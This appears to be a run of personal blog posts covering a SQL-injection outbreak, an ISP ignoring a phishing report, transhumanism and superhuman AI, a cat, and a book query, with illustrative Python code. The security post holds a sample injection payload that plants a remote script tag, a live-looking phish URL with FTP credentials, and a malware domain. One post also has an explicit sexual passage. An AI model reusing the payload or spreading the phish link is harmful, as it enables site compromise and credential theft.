Security is hard.

So the past few weeks have been rough on Microsoft and on Adobe. First, a flaw in Microsoft SQL Server allows ASP sites to be compromised by a general SQL injection attack; then a flaw in the Adobe Flash player allows a miscreant to hijack the Web browsers of people with the Flash plugin installed.

In both cases, the vulnerabilities have been exploited to try to redirect surfers to a Web site at www.dota11.cn, which hosts a malicious script that tries to infect users’ computers with a virus.
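
For anyone who hasn’t seen one up close, a SQL injection attack boils down to a Web application pasting whatever a visitor sends straight into a database query. Here’s a minimal sketch of the idea in Python; the table, the lookup, and the hostile payload are all invented for illustration (with example.invalid standing in for the real malicious script host), so none of this is the actual exploit.

```python
# A minimal sketch of an injectable query versus a parameterized one.
# The table, the lookup, and the hostile payload are all invented for
# illustration; this is not the actual attack against these sites.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE articles (id INTEGER, title TEXT)")
conn.execute("INSERT INTO articles VALUES (1, 'Security is hard')")

def vulnerable_lookup(article_id: str):
    # DON'T do this: the request parameter is pasted straight into the SQL,
    # so the "id" can smuggle in extra statements of the attacker's choosing.
    # (sqlite3 normally refuses multi-statement strings; executescript stands
    # in here for a driver that happily runs them.)
    query = "SELECT title FROM articles WHERE id = " + article_id
    conn.executescript(query)

def safe_lookup(article_id: str):
    # Parameterized query: the driver treats the value as data, never as SQL.
    return conn.execute(
        "SELECT title FROM articles WHERE id = ?", (article_id,)
    ).fetchall()

print(safe_lookup("1"))    # a normal request

# What a mass-injection bot might send instead of a plain article id:
hostile = ("1; UPDATE articles SET title = title || "
           "'<script src=http://example.invalid/x.js></script>'")
vulnerable_lookup(hostile)  # silently tacks a script tag onto every title
print(conn.execute("SELECT title FROM articles").fetchall())
```

Point that second pattern at every text column in a site’s database and you get more or less the scenario above: every page grows a script tag sending visitors somewhere unpleasant.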

That’s the old news.

The funny news–and believe me, I think this is fucking hysterical–is that one of the Web sites clobbered by the SQL injection attack is redmondmag.com, a Web site that is “the independent voice of the Microsoft IT community.” It’s a pro-Microsoft, look-how-great-we-are “news” site that has been so massively infected that…

uh…

…well, if you Google it, Google gives you a “this site may harm your computer” warning.

Many of the infected Web pages are pages about computer security–or, at least, apologies for Microsoft products masquerading as articles on computer security.

I know, I know, the real assholes here are the hackers, but still…goddammit, I can’t stop laughing.

Security is hard.

And it gets harder when ISPs are aware of security problems on their network but don’t care. And believe it or not, I’m not talking about iPower this time.

Actual IM transcript from a conversation with xmission.com:

Tacit: You are hosting a phish.
Tacit: ftp://webmaster:webmaster@204.228.142.40/.ws/eBayISAPIi.dll
catalyst: chill, you could send a notification to abuse@xmission.com or to phish@ebay.com or whatever they have now
Tacit: Sent it two weeks ago.
Tacit: And a week ago.
Tacit: No response, phish still active.
Tacit: Two weeks is a long time.
Tacit: Your abuse@ address appears to be routed straight to /dev/null.
catalyst: I’m not an xmission employee, so I can’t help, just thought I’d recommend some alternatives
rostrax: Abuse is a valid e-mail address and it is looked at.
rostrax: That would be my suggestion on what to do.
Tacit: Again?
Tacit: How many times do you think I should send the same email to abuse@xmission.com before I conclude that xmission supports and condones hacks and phishes on their network?
rostrax: How many times have you sent it?
Tacit: Four.
Tacit: First one two weeks ago.
rostrax: I cannot speak for our abuse team, but I’m sure they’ve looked into it
Tacit: If they’ve looked into it, and it’s still active, what conclusion would you draw from that?
Tacit: 204.228.142.40 is on your network, yes?
rostrax: It is one of the IP’s we have yes.
Tacit: And if you click on the above link, you would agree that it is definitely an eBay phish, yes?
rostrax: You have to understand business’ have certain ways of handling these things. It may take some time. Please be patient with us, if you could send another e-mail I would appreciate it greatly. Also cc it to rostrax [at] xmission.com
Tacit: I do understand that businesses operate certain ways; I run one myself. Two weeks to handle a phish? Even China Netcom deals with phish sites faster…
rostrax: I’m unsure of our particular policy, but if you can send the e-mail and cc me on it, I will look into it on Tuesday


Edit: It gets better. Apparently, this phish has been active on Xmission’s network since at least April 9th.

Teaching a Dog Calculus

This is actually a post about transhumanism and Outside Context Problems, and an epiphany I had last time I was in Chicago.

But first…

God damn did I wake up with a bad case of the hornies this morning. Jesus Christ in Heaven, I want to fuck. I want to feel soft skin against mine. I want to trace the curve of the neck with teeth and tongue. I want to hear the little intake of breath when I discover a sensitive spot. I want to rest my hand on the curve of the hip, I want to explore the roundness of breast with my fingertips. I want to run fingernails lightly up the back of the neck and see goosebumps form. Holy fuck it’s distracting.

Also, when I crawled out of bed and stumbled into the bathroom this morning, I was all like “Ow! Ow! Ouch! Ow! What the hell?” Some time last night, it seems, the cat had scoured the house for every smallish, vaguely cylindrical object he could find, and hidden them all underneath the rug in the bathroom. Pens, a plastic travel tube of Advil, a small bullet vibrator, an AA battery…it was like walking on marbles. WTF?

None of that is what I’m actually here to say.


I’ve been thinking a great deal these days about Outside Context Problems. Put briefly, an Outside Context Problem is what happens when a group, society, or civilization encounters something so far outside its own context and understanding that it is not able even to understand the basic parameters of what it has encountered, much less deal with it successfully. Most civilizations encounter such a problem only once.

For example, you’re a Mayan king. Life is pretty good for you; you’ve built a civilization at the pinnacle of technological achievement, you’ve dominated and largely pacified any competition you might have, you’ve created many wondrous things, and life is pretty comfortable.

Then, all at once, out of the blue, some folks clad in strange, impervious silver armor show up at your doorstep. They carry long sticks that belch fire and kill from great distances; some of them appear to have four legs; they claim to come from a place that you have never in your entire life even conceived might exist…

Civilizations that encounter Outside Context Problems end. Even if some members of the civilization survive, the civilization itself is irrevocably changed beyond recognition. Nothing like the original Native American societies exists today in any form that the pre-Columbians would recognize.

Typically, we think of Outside Context Problems in terms of situations that arise when one society has contact with another society that’s radically different and technologically far more advanced. But I don’t think it necessarily has to be that way.


In a sense, we are, right now, hard at work building our own Outside Context Problem, and it’s going to be internal, not external.

Right now, as I type this, one of the hottest fields of biomedical research is brain mapping and modeling. I’ve mentioned several times in the past the research being done by a Swiss group to model a mammalian brain inside a supercomputer; such a model is essentially a neuron-by-neuron, connection-by-connection emulation of a brain in a computer. Such an emulation will, presumably, act exactly like its biological counterpart; it is the connections and patterns of information, not the physical wetware, that make a brain act the way it does.
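
To give a flavor of what “neuron-by-neuron, connection-by-connection” means, here’s a toy emulation: a handful of leaky integrate-and-fire neurons wired together at random. This is the crudest possible cartoon of the real research (the Swiss group’s models track vastly more biological detail), and every constant in it is invented; the point is just that once a brain is software, knobs like the neuron count or the clock rate become a one-line edit.

```python
# A toy "neuron-by-neuron, connection-by-connection" emulation: a small
# pile of leaky integrate-and-fire neurons wired together at random.
# This is a cartoon, nothing like the detailed models described above,
# and every constant here is invented for illustration.
import random

NUM_NEURONS = 100   # doubling the brain is a one-character edit
DT_STEPS = 1000     # number of simulated time steps ("one second")
THRESHOLD = 1.0     # membrane potential at which a neuron fires
LEAK = 0.95         # how much of its potential a neuron keeps each step
WEIGHT = 0.15       # how hard a firing neuron nudges its targets

random.seed(1)

# Each neuron gets a handful of random downstream connections.
connections = [random.sample(range(NUM_NEURONS), 5) for _ in range(NUM_NEURONS)]
potential = [0.0] * NUM_NEURONS
spikes = 0

for step in range(DT_STEPS):
    incoming = [0.0] * NUM_NEURONS
    for i in range(NUM_NEURONS):
        # Leak a little charge, add a little random background input.
        potential[i] = potential[i] * LEAK + random.uniform(0.0, 0.1)
        if potential[i] >= THRESHOLD:
            spikes += 1
            potential[i] = 0.0                 # the neuron fires and resets...
            for target in connections[i]:      # ...nudging everything it's wired to
                incoming[target] += WEIGHT
    potential = [p + extra for p, extra in zip(potential, incoming)]

print(f"{spikes} spikes from {NUM_NEURONS} toy neurons in {DT_STEPS} steps")
```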

This group claims to be ten years from being able to model a human brain inside a computer. Ten years, and we may see the advent of true AI.


Let me backtrack a little. The field of AI has, so far, been disappointing. For decades, we have struggled to program computers to be smart. The problem is, we don’t really quite know what we mean by “smart.” Intelligence is not an easily defined thing; and it’s not like you can sit down and break up generalized, adaptive intelligence into a sequence of steps.

Oh, sure, we’ve produced expert systems that can design computer chips, simulate bridges, and play chess far better than a human can. In fact, we don’t even have grandmaster-level human/machine chess tournaments any more, because the machines always win. Always. Deep Blue, the supercomputer that beat human grandmaster Garry Kasparov in a much-publicized match, is by modern standards a cripple; ordinary desktop PCs today are more powerful.

But these are simple, iterative tasks. A chess-playing computer isn’t smart. It can’t do anything besides play chess, and it approaches chess as a simple iterative mathematical problem. That’s about where AI has been for the last four decades.
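
In case “simple iterative mathematical problem” sounds too dismissive, here’s the skeleton of how a chess machine actually “thinks”: recursive search over future positions, keeping the move with the best guaranteed outcome (minimax). A real engine layers alpha-beta pruning and position-evaluation heuristics on top, and chess itself won’t fit in a blog post, so this sketch searches a trivial made-up take-away game instead; the shape of the reasoning is the same.

```python
# The skeleton of how a chess machine "thinks": recursively search the
# tree of future positions and keep the move with the best guaranteed
# outcome (minimax). Chess won't fit in a blog post, so this searches a
# made-up take-away game instead: players alternate taking 1-3 stones
# from a pile, and whoever takes the last stone wins. Same shape of
# reasoning, vastly smaller tree.

def best_move(pile: int, maximizing: bool) -> tuple[int, int]:
    """Return (score, stones_to_take), where score is +1 if the side we
    are rooting for can force a win from here and -1 if it cannot."""
    if pile == 0:
        # The previous player took the last stone and won, so whoever is
        # to move now has lost.
        return ((-1 if maximizing else 1), 0)
    best = None
    for take in (1, 2, 3):
        if take > pile:
            break
        score, _ = best_move(pile - take, not maximizing)
        if (best is None
                or (maximizing and score > best[0])
                or (not maximizing and score < best[0])):
            best = (score, take)
    return best

score, move = best_move(10, True)
print(f"From a pile of 10 stones, take {move} (forced win: {score == 1})")
```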

New approaches, though, are not about programming computers to act smart. They are about taking systems which are smart–brains–and rebuilding them inside a computer. If this approach works, we will create our own Outside Context Problem.


Human brains are pretty pathetic, from a hardware standpoint. Our neurons are painfully, agonizingly slow. They are slow to respond, they are slow to fire, they are slow to reset after they have fired, and they are slow to form new connections. All these things limit our cognitive capabilities; they impose constraints on how adaptable our intelligence is, and how smart we can become.

Computers are fast. They encode new information rapidly and efficiently. Raw computing power available from a given square inch of silicon real estate doubles roughly every eighteen months. Modeling a brain in a computer removes many of the constraints; such a modeled brain can operate more quickly and more efficiently, and as more computer power becomes available, the complexity of the model–the number of neurons modeled, the richness of the interconnections between them–increases too.


We humans like to make believe that we are somehow the apex of creation–and not just of creation, but of all possible creation. It pleases us to imagine that we are created in the image of some divine heavenly architect–that the universe and everything in it was made by some sapient being, that that sapient being is recognizable to us, and that that sapient being is like us. We like to tell ourselves that there is no limit to human imagination, that human intellect can understand and achieve anything, and so on.

Now, all of this is really embarrassingly self-serving. It’s also easy enough to deflate. The human imagination is indeed limited, though by definition limitations in the things you can conceive of tend to be hard to see, because you…can not conceive of things you can not conceive of. (As one person once challenged me, without apparent irony: “Name something the human imagination can’t conceive of!”)

But it’s relatively easy to find some of the boundaries of human imagination. For example:

• Imagine one apple. Just an apple, floating alone on a plain white background. Easy to do, right?
Imagine three apples, perhaps arranged in a triangle, floating in stark white nothingness. Simple, yes? Four apples. Picture four apples in your head. Got it?

Now, picture 17,431 apples in your head, each unique. Visualize all of them together, and make your mental image contain each of those apples separately and distinctly. Got it? I didn’t think so.

• Imagine a cube in your head. Think of all the faces of the cube and how they fit together. Rotate the imaginary cube in your head. Got it going? Good.

Now imagine a seventeen-dimensional cube in your head. Picture what it would look like rotating through seventeen-dimensional space. Got it?

The first example indicates one particular kind of boundary on our imaginations: our limited resolving power when it comes to holding discrete images in our heads. The second shows another boundary: our imaginations are circumscribed by the limitations of our experiences, as perceived and interpreted through finite (and, it must be said, quite limited) senses. Quantum mechanics and astrophysics often pose riddles whose math suggests behaviors we have a great deal of difficulty imagining, because our imaginations were formed through the experiences of a very limited slice of the universe: medium-sized, medium-density mass-bearing objects moving quite slowly with respect to one another. Go outside those constraints, and we may be able to understand the math, but the reality of the way these systems work is, at best, right at the threshold of the limitations of our imaginations.
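
That last point is worth making concrete: a seventeen-dimensional cube is hopeless to picture, but it is trivially easy to describe and push around numerically. A quick sketch (just the standard unit-hypercube construction, nothing exotic):

```python
# We can't picture a seventeen-dimensional cube, but the math doesn't
# care: its corners are just every 17-long string of 0s and 1s, and
# "rotating" it is ordinary trigonometry applied to two axes at a time.
import itertools
import math

DIM = 17
corners = list(itertools.product((0, 1), repeat=DIM))
print(f"A {DIM}-dimensional cube has {len(corners)} corners "
      f"and {DIM * 2 ** (DIM - 1)} edges.")

def rotate(point, axis_a, axis_b, angle):
    """Rotate a point within the plane spanned by two chosen axes."""
    p = list(point)
    a, b = p[axis_a], p[axis_b]
    p[axis_a] = a * math.cos(angle) - b * math.sin(angle)
    p[axis_b] = a * math.sin(angle) + b * math.cos(angle)
    return p

# Spin one corner thirty degrees in the plane of axes 3 and 11:
print(rotate(corners[-1], 3, 11, math.radians(30))[:5], "...")
```

The computation shrugs; it’s only the mind’s eye that gives out.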


Everyone who has ever owned a dog knows that dogs are capable of a surprisingly sophisticated sort of reasoning. Dogs understand that they are separate entities; they interact with other entities, such as other dogs and humans, in complex ways; they can differentiate between other living entities and non-living entities, for the most part (though I’ve seen dogs who are confused by television images); they have emotional responses that mirror, on a simple scale, human emotional responses; they are capable of planning, problem-solving, and analytical reasoning.

They can not, however, learn calculus.

No matter how smart your dog is, there are things it can not understand and will never understand because of the biological constraints on its brain. You will never teach a dog calculus; in fact, a dog is not capable of understanding what calculus is.

Yes, I know you think your dog is very smart. No, your dog can’t learn calculus. Yes, you can too, if you set your mind to it; the point here is that there are realms of knowledge unavailable to the entire species, because all dogs, no matter how smart they may be in comparison to other dogs, lack the necessary cognitive tools to get there.

The intelligence of every organism is circumscribed in part by that organism’s physical biology. And just as there are entire realms and categories of knowledge unavailable to a dog, so too are there realms of knowledge unavailable to us. What are they? I don’t know; I can’t see them. That’s exactly the point.


To get back to the idea of artificial intelligence: A generalized AI would in many ways not be subject to the same limitations we are. One nice thing about modeled brains that isn’t true of human brains is that we can easily tinker with them. The human brain is limited in the total number of neurons within it by the size and shape of the human pelvis; we can’t fit larger brains through the birth canal. We have, in essence, encountered a fundamental evolutionary barrier.

Similarly, we can’t easily make neurons faster; their speed is limited by the complex biochemical cascade of events which makes them fire (contrary to popular belief, neurons don’t communicate via electrical signals; they change state electrochemically, by the movement of charged ions across a membrane, and the speed with which a signal travels is dependent on the speed with which ions can propagate across the membrane and then be pumped back again). They are limited in how quickly they can learn new things by the speed with which neurons can grow new interconnections, which is pretty painful, really.

But a model of a brain? What if we double the number of neurons? Increase the speed at which they send signals? Increase the efficiency with which new connections form? These are all obvious and logical paths to explore.

And the thing about generalized AI is that it’s so goddamn useful. We want it, and we’re working very hard toward it, because there are just so many things our current, primitive computers are poor at that generalized AI would be good at.

And one of those things, as it happens, is likely to be improving itself.


The first generalized AI will be a watershed. Even if it isn’t very smart, it can easily be put to the task of making AIs that are smarter. And smarter still. Hell, just advances in the underlying processor power of the computer beneath it–whatever that computer may look like–will probably make it smarter. Able to think faster, hold more information, remember more…and able to have whatever senses we give it, including senses our own physiology doesn’t have.

The first generalized AI might not be smarter than us, but subsequent ones will be, oh yes. You can bank on that. And that soon presents an Outside Context Problem.

Because how do we relate to a sapience that’s smarter than we are?

In transhumanist circles, this is called a singularity–a change so profound that the people before the singularity can not imagine what life after the singularity is like.

There have been many singularities throughout human history. The development of agriculture, the Iron Age, the development of industrialization–all of these created changes so profound that a person living in a time before these things could not imagine what life after these things is like. However, the advent of smart and rapidly-improving AI is different, because it presents a singularity and an Outside Context Problem all rolled up into one.

In past singularities, the fundamental nature of human beings and human intelligence has not changed. A Bronze Age human is not necessarily dumber than an Iron Age human. Less knowledgeable, perhaps, but not dumber. The Bronze Age human could not anticipate Iron Age technology, but if the two met, they would still recognize each other.

But a smarter-than-us AI is different, in the ways we are different from a dog. We would not–we cannot–understand the perception or experience of something smarter than we are, any more than a dog can understand what it means to be human. And that presents an interesting challenge indeed.

Civilizations tend not to survive contact with Outside Context Problems.


Which brings me, at last, to an epiphany that I had while I was walking with dayo in Chicago.

Transhumanism is the notion that human beings can become, with the application of intelligence and will, more than we are right now. I’ve talked about it a great deal in the past, and talked about some of the reasons I am a transhumanist.

But here’s a new one, and I think it’s important.

Strong AI is coming. It’s really only a matter of time. We are learning that our own intelligence is the result of physical processes within our brain, not the result of magical supernatural forces or spirits. We are working on applying the results of this knowledge to the problem of creating things that are not-us but that are smart like us.

Now, there are several ways we can approach this. One is by creating models of ourselves in computers; another is by using advances in nanotechnology and biomedical science to make ourselves smarter, and improve the capabilities of our wet and slow but still serviceable brains.

Or, we can create something not based on us at all; perhaps by using adaptive neural networks to model increasingly complex systems in a sort of artificial evolutionary system, trying things at random and choosing the smartest of those things until eventually we create something as smart as us, but self-improving and altogether different.
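
The “trying things at random and choosing the smartest” loop in that last approach is an evolutionary algorithm, and its skeleton is surprisingly small. Here’s a sketch where the “intelligence test” is deliberately trivial (match a target string) and the candidates are strings rather than neural networks, because the genuinely hard part of the real program is exactly that fitness test; everything in it is invented for illustration.

```python
# The bare skeleton of the "try things at random, keep the smartest"
# approach: an evolutionary loop. The fitness test here is deliberately
# trivial (match a target string); in the real research program, the
# hard part is precisely what to use as the fitness test.
import random

random.seed(0)
TARGET = "as smart as us"
ALPHABET = "abcdefghijklmnopqrstuvwxyz "
POP_SIZE = 200
MUTATION_RATE = 0.05

def fitness(candidate: str) -> int:
    # Count the characters that already match the target.
    return sum(c == t for c, t in zip(candidate, TARGET))

def mutate(candidate: str) -> str:
    # Each character has a small chance of being randomly rewritten.
    return "".join(
        random.choice(ALPHABET) if random.random() < MUTATION_RATE else c
        for c in candidate
    )

# Start from pure noise.
population = [
    "".join(random.choice(ALPHABET) for _ in TARGET) for _ in range(POP_SIZE)
]

generation = 0
while max(map(fitness, population)) < len(TARGET):
    generation += 1
    # Selection: keep the fittest tenth...
    population.sort(key=fitness, reverse=True)
    parents = population[: POP_SIZE // 10]
    # ...and refill the population with mutated copies of the survivors.
    population = [mutate(random.choice(parents)) for _ in range(POP_SIZE)]

print(f"Matched {TARGET!r} after {generation} generations.")
```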

Regardless, we have a choice. We can make ourselves into this new whatever-it-is, or we can make something entirely independent from us.

However we make it, it will likely become our successor. Civilizations tend not to survive contact with Outside Context Problems.

If we are to be replaced–and I think, quite honestly, that that is only a matter of time as well–I would rather that we are replaced by us, by Humanity 2.0, than see us replaced by something that is entirely not-us. And I think transhumanism, refined down to its most simple essence, is the replacing of us by us, rather than by something that is not-us.

Waking up

Every night, when I go to bed, the kitty Liam usually follows me and falls asleep on the pillow next to me. It’s really heart-meltingly cute, and would be even cuter if he didn’t have the habit of waking up at three o’clock in the morning and tearing around the apartment, or fighting with one of the stray cats around here through the sliding glass door onto the patio. (At least I assume that’s what they’re doing. Maybe they want to be friends, I don’t know. Regardless, they bat at each other through the glass; it’s about as noisy as a handful of marbles tossed into a blender.)

After the requisite “wake Franklin up in the middle of the night,” Liam comes back to bed and curls up on the pillow again until morning comes.

Morning brings with it sharp teeth. The cat, you see, usually wakes up before I do, and morning is his “pet me” time. He lets me know it’s “pet me” time by biting my nose until I’m awake, then biting my nose until I pet him.

Come to think of it, we have kind of a dysfunctional relationship, he and I. He badgers me into giving him attention, and I provide it.

I open my eyes each morning and see, blurry and out of focus, cat teeth right in front of my face. I can’t help but think this is the last sight of many a small prey animal throughout history, and that if I were small enough for him to eat, he would no doubt make me into an hors d’oeuvre in a heartbeat.

I keep my cell phone next to my bed, so this morning, when Liam woke me with his customary “Pet me! Pet me, hyooman, or I shall rip the nose from your face and devour it before your very eyes!” routine, I snapped some phone camera pics so you, too, can see what I go through every morning.

Notice how he grabs my face with his paws. This is so he can prevent me from moving my nose away.

His teeth and claws are very sharp. Weird, it is, that we as a species enjoy sharing our homes with small predators.

Well, THAT was fast…

All the folks I sent out query letters to say to expect an answer in 4-6 weeks.

I got an answer from one of the literary agents I queried today. She wants to see a formal proposal, sample chapter, and marketing plan.

*yikes*

I had planned on raiding Serpentshrine Cavern in WoW this weekend, but it looks like I’ll be writing a book proposal instead… *panics*

Fun Link o’ the Day: Chemistry

http://pubs.acs.org/cgi-bin/abstract.cgi/inocaj/2004/43/i11/abs/ic0352250.html

“Two novel ruthenium polypyridine complexes, [Ru(bpy)2Cl(BPEB)](PF6) and {[Ru(bpy)2Cl]2(BPEB)}(PF6)2 (BPEB = trans-1,4-bis[2-(4-pyridyl)ethenyl]benzene), were synthesized and their characterization carried out by means of elemental analysis, UV-visible spectroscopy, positive ion electrospray (ESI-MS), and tandem mass (ESI-MS/MS) spectrometry,” reads the abstract, “as well as by NMR spectroscopy and cyclic voltammetry.”

But oh, those wacky chemists. You have got to see the accompanying illustration of the macroscale molecular complexes in question.

Wish me luck!

So Gina and I have spent the past couple of nights revising and re-revising a query letter for the book on polyamory I’ve been on-again, off-again working on. It’s been great; she’s a veteran of this getting-books-published thing, with a couple of books already under her belt, so I was absolutely delighted when she volunteered to help. This project has been pushing on me lately, and I really would like to see it happen.

Anyway, the query letter is done, I’m working on a formal proposal (in case anyone should bite at the query), I’ve made a list of agents and publishers interested in this sort of material, and tomorrow I plan to start mailing the query out.

Wish me luck!